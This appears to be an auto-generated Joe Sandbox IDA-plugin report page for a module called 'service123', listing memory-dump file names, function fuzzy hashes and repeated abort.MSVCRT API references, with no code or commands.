Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 0881f4fb79b60dbcb3f2ae96032946d86b079ed929a92c3d9f6cb966978f0eaa
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 8DF0A7357DC03A8A87106A1D44115A577BB7E6F30CBDE4495D4807BF24C611D543C797

Function 6C9CBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879bb8c58b4f885aa70eb28c282b5e229df6ee2efafa2df334628f98cff77a82
Instruction ID: f5c936bd51696f087e4e76b02612abd82e27b6de799e33277aac0a7b02e45852
Opcode Fuzzy Hash: 879bb8c58b4f885aa70eb28c282b5e229df6ee2efafa2df334628f98cff77a82
Instruction Fuzzy Hash: BB016D73B05A2607D3004E74C4E1361B6B65F83318F19C669CD7527F8AC634E818E692

Function 6C9CBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 0f3a9fe046847a7b95297ded668a0587226d1eec97209da4703b124cfe309b6e
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: 08E08C3374A72A4B86107998B4510BAB2A89F6239CF161C28C928B3E10D741E84CC2C3

Function 6C9CBE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 67c661e7fa0915a9c4320dd69cd56a4176db31b7f520f2beade0b2ee99bf98aa
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: D1D0A73164D52B4B8B046F2C40A98ADF3F96F6734C71B9CD4C005F3E05DA21FA09CA06

Function 6C9CBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 9e4986a0592363dd0d1f2e4a32a2e77e8685f8a03578dae877adc0e461a9654e
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 60D01230289B198F8300FF08D194469B7F59F5B309B029D65C405A7F20D635D408CA46

Function 6C9CBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 08984ce5ba32a9c32d24cea63d9eebc0fe819fb58a7a8c59351d8b57d1534f2f
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 1AC01222A897294BC3103D981061366F2A49F2724CF176C58885533F008F51F804C587

Function 6C9CBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: af3f6a9eab4ab779fce9105022afacd2b24e97913bf1a98a4136847e23881a3d
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: 3CC012367596258B8340BE8490614A9B2B4AF7B34CF072C94C41173F108B60F408C587

Function 6C9CBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: cabda8cfd6b07fcb7ec8389a54e55f100741d7e56658fa770acdbf4d8a49ed24
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: D7C08C32ACCB294703403D0810A1078B2A80F2726CB072D54C00033F00CE06E848C48B

Function 6C9CC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ae7e7434e4c330234441660cc821742c6f157b222bc7a59185196286515e80
Instruction ID: bf6d801d9361e07c7a3735c53f304c764da8751763462b273b72fb9732320077
Opcode Fuzzy Hash: 65ae7e7434e4c330234441660cc821742c6f157b222bc7a59185196286515e80
Instruction Fuzzy Hash: FDB1BF716083868FD710DF68D48075ABBE1BF9A308F08496DE9A59BB42C335E945CB93

Function 6C9CC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9CC5DB), ref: 6CA96D44
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
